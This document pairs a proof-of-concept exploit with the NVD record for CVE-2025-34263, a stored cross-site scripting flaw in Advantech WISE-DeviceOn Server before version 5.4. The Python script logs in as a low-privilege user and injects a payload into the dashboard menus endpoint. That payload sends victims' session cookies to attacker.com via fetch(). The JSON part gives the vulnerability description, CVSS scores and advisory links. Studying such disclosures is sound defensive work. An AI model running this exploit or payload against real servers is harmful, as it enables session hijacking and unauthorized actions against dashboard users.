CVE-2025-34263

# CVE-2025-34263 Stored XSS PoC # Target: Advantech WISE-DeviceOn Server < 5.4 # Endpoint: /rmm/v1/plugin-config/dashboards/menus import requests import json import sys # Configuration TARGET_URL = "http://target-server.com" LOGIN_URL = f"{TARGET_URL}/rmm/v1/auth/login" XSS_PAYLOAD = '<img src=x onerror="fetch(\'http://attacker.com/steal?cookie=\'+document.cookie)">' def exploit_stored_xss(): """Exploit stored XSS in dashboard menus endpoint""" # Step 1: Authenticate with low-privilege account session = requests.Session() login_data = { "username": "low_priv_user", "password": "password123" } try: login_response = session.post(LOGIN_URL, json=login_data, timeout=10) if login_response.status_code != 200: print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Inject XSS payload into dashboard menu menu_url = f"{TARGET_URL}/rmm/v1/plugin-config/dashboards/menus" malicious_menu = { "label": XSS_PAYLOAD, "path": "/dashboard/malicious", "icon": "chart", "order": 1 } inject_response = session.post(menu_url, json=malicious_menu, timeout=10) if inject_response.status_code in [200, 201]: print("[+] XSS payload injected successfully") print(f"[+] Payload stored in menu ID: {inject_response.json().get('id')}") return True else: print(f"[-] Injection failed: {inject_response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": print("CVE-2025-34263 Stored XSS Exploitation") print("=" * 40) exploit_stored_xss()

{"cve": {"id": "CVE-2025-34263", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:56.133", "lastModified": "2025-12-17T17:15:49.663", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/plugin-config/dashboards/menus endpoint. When an authenticated user adds or edits a dashboard entry, the label and path values are stored in plugin configuration data and later rendered in the dashboard UI without proper HTML sanitation. An attacker can inject malicious script into either field, which is then executed in the browser context of users who view or interact with the affected dashboard, potentially enabling session compromise and unauthorized actions as the victim."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:advantech:wise-deviceon_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4", "matchCriteriaId": "BFB1F2C4-C260-473E-A6E1-EE7DFC3EF083"}]}]}], "references": [{"url": "https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn-20251208-2.pdf", "source": "[email protected]"}, {"url": "https://docs.deviceon.advantech.com/docs/resource/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-pluginconfig-dashboards-menus", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}